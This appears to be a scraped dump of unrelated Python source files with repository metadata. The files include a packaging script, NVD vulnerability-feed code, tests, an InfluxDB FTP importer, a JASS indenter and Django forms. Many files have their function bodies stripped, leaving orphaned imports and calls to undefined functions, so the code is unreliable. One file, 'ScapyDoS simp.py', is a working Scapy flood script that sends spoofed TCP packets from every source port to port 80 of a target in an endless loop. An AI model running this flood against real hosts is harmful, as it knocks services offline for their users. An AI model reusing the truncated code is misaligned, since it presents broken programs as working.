# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
# Metodo, que entrena un modelo ya compilado, implementa callbacks de
# tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre
# mejoras en el loss, tambien grafica y crea matriz de confusion
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
| 35.359477 | 84 | 0.697227 |
fe774ebe12faa6fdf372c8d9db66e886229109cb | 3,563 | py | Python | setup.py | truggles/pudl | 6f41664f8243b8f7aafdbbfc8522f96043dbf561 | [
"MIT"
] | null | null | null | setup.py | truggles/pudl | 6f41664f8243b8f7aafdbbfc8522f96043dbf561 | [
"MIT"
] | null | null | null | setup.py | truggles/pudl | 6f41664f8243b8f7aafdbbfc8522f96043dbf561 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='pudl@catalyst.coop',
maintainer='Zane A. Selvans',
maintainer_email='zane.selvans@catalyst.coop',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
)
| 30.452991 | 79 | 0.641033 |
fe77c98170bf9d8232497412401b6f749ddb70f7 | 7,836 | py | Python | src/vulnix/nvd.py | dermetfan/vulnix | 06daccda0e51098fbdbc65f61b6663c5c6df9358 | [
"BSD-3-Clause"
] | 217 | 2016-07-03T10:45:56.000Z | 2022-03-30T12:06:51.000Z | src/vulnix/nvd.py | dermetfan/vulnix | 06daccda0e51098fbdbc65f61b6663c5c6df9358 | [
"BSD-3-Clause"
] | 70 | 2016-06-27T08:47:22.000Z | 2022-01-22T19:10:53.000Z | src/vulnix/nvd.py | dermetfan/vulnix | 06daccda0e51098fbdbc65f61b6663c5c6df9358 | [
"BSD-3-Clause"
] | 24 | 2016-06-27T09:23:50.000Z | 2022-01-30T05:32:22.000Z | from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
| 32.786611 | 79 | 0.590225 |
fe7996f8bc015e9c1e0a7458bde9909f14df8fbf | 316 | py | Python | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | null | null | null | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1 | 22.571429 | 42 | 0.550633 |
fe79e20af0abaadf27ef0edd6010a9d9587df465 | 2,019 | py | Python | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 18 | 2018-09-11T01:14:31.000Z | 2021-12-27T10:21:59.000Z | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 77 | 2018-09-19T09:28:33.000Z | 2021-11-12T13:31:50.000Z | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 8 | 2019-06-17T16:02:32.000Z | 2021-06-30T23:31:17.000Z | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
if __name__ == '__main__':
unittest.main() | 30.590909 | 93 | 0.618128 |
fe7a4e994d80d1a5a6af69534d2790e8dc14f03c | 4,354 | py | Python | data_importer_ftp.py | supsi-dacd-isaac/oasi-ozone-forecaster | 01d23c374e857dcc6d556d073c0380186c2934d2 | [
"MIT"
] | null | null | null | data_importer_ftp.py | supsi-dacd-isaac/oasi-ozone-forecaster | 01d23c374e857dcc6d556d073c0380186c2934d2 | [
"MIT"
] | null | null | null | data_importer_ftp.py | supsi-dacd-isaac/oasi-ozone-forecaster | 01d23c374e857dcc6d556d073c0380186c2934d2 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# -----------------------------------------------------------------------------#
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| 41.075472 | 119 | 0.475195 |
fe7b77f497a02a03531071b294b121357332567e | 2,791 | py | Python | autoindent_code_JASS_war3map_j.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | autoindent_code_JASS_war3map_j.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | autoindent_code_JASS_war3map_j.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| 23.258333 | 80 | 0.638839 |
fe7bebb9c7d420d8879b0fc07f857afa803296a1 | 5,656 | py | Python | python/addNewData.py | TruX-DTF/fixminer_source | 5ab2d6f582743c377eadb21cd466a3a25809bc2d | [
"MIT"
] | 5 | 2021-07-19T12:30:00.000Z | 2022-01-14T16:41:00.000Z | python/addNewData.py | SerVal-DTF/fixminer_source | 5ab2d6f582743c377eadb21cd466a3a25809bc2d | [
"MIT"
] | 10 | 2020-04-06T09:52:19.000Z | 2021-06-01T08:05:25.000Z | python/addNewData.py | SerVal-DTF/fixminer_source | 5ab2d6f582743c377eadb21cd466a3a25809bc2d | [
"MIT"
] | 5 | 2019-08-26T11:02:35.000Z | 2021-03-23T15:42:09.000Z | from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
| 39.552448 | 299 | 0.592999 |
fe7d3ca44a30c1b45cb010d74a7365ccccfb69bc | 691 | py | Python | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Flask , .
app.config['JSON_AS_ASCII'] = False # .
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
| 24.678571 | 68 | 0.727931 |
fe7e1b8337434731ea17dce123e62981ed1e6ab4 | 87 | py | Python | pyano2/apps.py | mental689/pyano | 2bc75e79618392f2013dfde2ac8035fe5fa1dc61 | [
"MIT"
] | 1 | 2022-01-31T17:34:37.000Z | 2022-01-31T17:34:37.000Z | pyano2/apps.py | mental689/pyano | 2bc75e79618392f2013dfde2ac8035fe5fa1dc61 | [
"MIT"
] | null | null | null | pyano2/apps.py | mental689/pyano | 2bc75e79618392f2013dfde2ac8035fe5fa1dc61 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 14.5 | 33 | 0.747126 |
fe7f812fda345139b99dd24f883eb46ae8bf8541 | 609 | py | Python | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | 1 | 2020-08-28T14:57:15.000Z | 2020-08-28T14:57:15.000Z | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | null | null | null | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | 1 | 2021-03-11T23:20:58.000Z | 2021-03-11T23:20:58.000Z | """
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
| 33.833333 | 91 | 0.714286 |
fe8041c5c55101ae0dcfff5c78088fd9a509554f | 6,805 | py | Python | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | gnmerritt/volttron | ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3 | [
"Apache-2.0"
] | 1 | 2020-05-26T01:29:50.000Z | 2020-05-26T01:29:50.000Z | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | gnmerritt/volttron | ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3 | [
"Apache-2.0"
] | null | null | null | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | gnmerritt/volttron | ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 38.885714 | 103 | 0.680235 |
fe83754072cf9c384870b3ad7538706613b6e5d9 | 675 | py | Python | apps/inventory/serializers.py | sseits-skku/its-backend | faf020568b930aaff4958d47602c511aad8a6c8e | [
"MIT"
] | null | null | null | apps/inventory/serializers.py | sseits-skku/its-backend | faf020568b930aaff4958d47602c511aad8a6c8e | [
"MIT"
] | 8 | 2020-06-05T23:00:49.000Z | 2022-03-11T23:59:32.000Z | apps/inventory/serializers.py | sseits-skku/its-backend | faf020568b930aaff4958d47602c511aad8a6c8e | [
"MIT"
] | 1 | 2019-10-01T13:07:22.000Z | 2019-10-01T13:07:22.000Z | from rest_framework.serializers import ModelSerializer
from .models import Place, Status, OSType, Stock, ComputerStock
| 19.852941 | 63 | 0.675556 |
fe86745dc1d7b386636a2027dae3d2552bd3e833 | 2,412 | py | Python | test/dict_parameter_test.py | shouldsee/luigi | 54a347361ae1031f06105eaf30ff88f5ef65b00c | [
"Apache-2.0"
] | 14,755 | 2015-01-01T09:33:34.000Z | 2022-03-31T15:38:39.000Z | test/dict_parameter_test.py | shouldsee/luigi | 54a347361ae1031f06105eaf30ff88f5ef65b00c | [
"Apache-2.0"
] | 2,387 | 2015-01-01T09:16:13.000Z | 2022-03-12T13:55:43.000Z | test/dict_parameter_test.py | shouldsee/luigi | 54a347361ae1031f06105eaf30ff88f5ef65b00c | [
"Apache-2.0"
] | 2,630 | 2015-01-02T06:11:32.000Z | 2022-03-27T22:11:20.000Z | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest, in_parse
import luigi
import luigi.interface
import json
import collections
| 37.6875 | 105 | 0.679934 |
fe87946e35b940790f2abaab6a2a55e9294ad44f | 7,305 | py | Python | echoscope/source/mysql_source.py | treeyh/echoscope | ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da | [
"MIT"
] | 1 | 2022-01-18T09:19:38.000Z | 2022-01-18T09:19:38.000Z | echoscope/source/mysql_source.py | treeyh/echoscope | ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da | [
"MIT"
] | null | null | null | echoscope/source/mysql_source.py | treeyh/echoscope | ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da | [
"MIT"
] | 1 | 2022-01-18T09:19:39.000Z | 2022-01-18T09:19:39.000Z | # -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
| 39.701087 | 411 | 0.675975 |
fe87ead9a791db821c1f883b4076bac8b4dc4efb | 99,064 | py | Python | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 2 | 2018-03-11T08:38:43.000Z | 2021-09-25T07:46:44.000Z | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 208 | 2017-06-30T10:32:12.000Z | 2022-03-29T10:38:32.000Z | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 6 | 2017-06-01T20:33:31.000Z | 2021-10-04T09:44:09.000Z | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
| 50.594484 | 265 | 0.589447 |
fe8a256140b6390c55cadca6d58880f260544702 | 5,253 | py | Python | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
# ========================================================================== #
# ========================================================================== #
| 26.938462 | 80 | 0.491148 |
fe8a7abf97fc4938deedb4a0e775164e6040fb1b | 1,042 | py | Python | test-drf-project/tests/conftest.py | fvlima/drf-view-profiler | a61d48e9835679f812d69d24ea740b947836108c | [
"MIT"
] | 30 | 2019-10-16T12:48:16.000Z | 2021-11-23T08:57:27.000Z | test-drf-project/tests/conftest.py | fvlima/drf-view-profiler | a61d48e9835679f812d69d24ea740b947836108c | [
"MIT"
] | null | null | null | test-drf-project/tests/conftest.py | fvlima/drf-view-profiler | a61d48e9835679f812d69d24ea740b947836108c | [
"MIT"
] | 1 | 2021-11-23T07:28:04.000Z | 2021-11-23T07:28:04.000Z | from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
| 24.809524 | 100 | 0.794626 |
fe8b3957ceddf0ec804e544f4e167363b9d84f54 | 3,553 | py | Python | Examples/VirtualLab/virtual_experiment_f.py | diehlpk/muDIC | b5d90aa62267b4bd0b88ae0a989cf09a51990654 | [
"MIT"
] | 70 | 2019-04-15T08:08:23.000Z | 2022-03-23T08:24:25.000Z | Examples/VirtualLab/virtual_experiment_f.py | diehlpk/muDIC | b5d90aa62267b4bd0b88ae0a989cf09a51990654 | [
"MIT"
] | 34 | 2019-05-03T18:09:43.000Z | 2022-02-10T11:36:29.000Z | Examples/VirtualLab/virtual_experiment_f.py | diehlpk/muDIC | b5d90aa62267b4bd0b88ae0a989cf09a51990654 | [
"MIT"
] | 37 | 2019-04-25T15:39:23.000Z | 2022-03-28T21:40:24.000Z | # This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| 36.628866 | 112 | 0.731776 |
fe8b6fcdfeb01114b63f0a0d1b3c6d4bd1396297 | 81 | py | Python | src/template_config.py | ckaestne/toxicity-detector | bb00ffe4470c6c1a2f561212d487d56eab5a5da7 | [
"MIT"
